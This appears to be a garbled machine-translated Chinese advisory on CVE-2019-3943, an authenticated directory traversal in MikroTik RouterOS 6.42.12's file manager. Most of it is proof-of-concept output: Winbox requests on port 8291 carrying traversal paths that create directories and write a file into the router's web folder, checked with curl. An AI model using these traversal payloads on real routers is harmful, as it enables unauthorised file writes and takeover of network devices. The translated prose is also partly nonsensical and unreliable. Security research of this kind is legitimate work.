可耐受性发现漏洞同时分析MikroTik路由6.42.12脆弱度是一个认证远程目录遍历mkdir,读取并写入访问沙盒路径外文件/rw/disk.攻击者读取整个文件系统并写存取所有不标为只读位置
脆弱度非常相似CVE-2018-14847.主要的差别在于新漏洞存在于文件管理员二进制数(SYS_TO数:72)并需要认证来调用它遍历逻辑不变,HTTP或Winbox(8291)可达
下输出取自a证明概念创建网页简单表示Hello
[email protected]:~/routeros/poc/cve_2019_3943/build$ curl http://192.168.1.15/webfig/lol.txt错误404: 未找到错误404: 未找到
白化病[email protected]:~/routeros/poc/cve_2019_3943/build$ ./cve_2019_3943_poc -i 192.168.1.15 -p 8291 req: {bff0005:1,uff0006:1,uff0007:6,s1:'//./.././.././../pckg/lol',Uff0001:[72,1]} resp: {uff0003:2,uff0006:1,Uff0001:[],Uff0002:[72,1]} req: {bff0005:1,uff0006:2,uff0007:6,s1:'//./.././.././../pckg/lol/home',Uff0001:[72,1]} resp: {uff0003:2,uff0006:2,Uff0001:[],Uff0002:[72,1]} req: {bff0005:1,uff0006:3,uff0007:6,s1:'//./.././.././../pckg/lol/home/web/',Uff0001:[72,1]} resp: {uff0003:2,uff0006:3,Uff0001:[],Uff0002:[72,1]} req: {bff0005:1,uff0006:4,uff0007:6,s1:'//./.././.././../pckg/lol/home/web/webfig',Uff0001:[72,1]} resp: {uff0003:2,uff0006:4,Uff0001:[],Uff0002:[72,1]} req: {bff0005:1,uff0006:5,uff0007:1,s1:'//./.././.././../pckg/lol/home/web/webfig/lol.txt',Uff0001:[72,1]} resp: {ufe0001:1,uff0003:2,uff0006:5,Uff0001:[],Uff0002:[72,1]} req: {bff0005:1,ufe0001:1,uff0006:6,uff0007:2,r5:[104,101,108,108,111,33,10],Uff0001:[72,1]} resp: {uff0003:2,uff0006:6,Uff0001:[],Uff0002:[72,1]}[email protected]:~/routeros/poc/cve_2019_3943/build$ curl http://192.168.1.15/webfig/lol.txt hello![email protected]:~/routeros/poc/cve_2019_3943/build$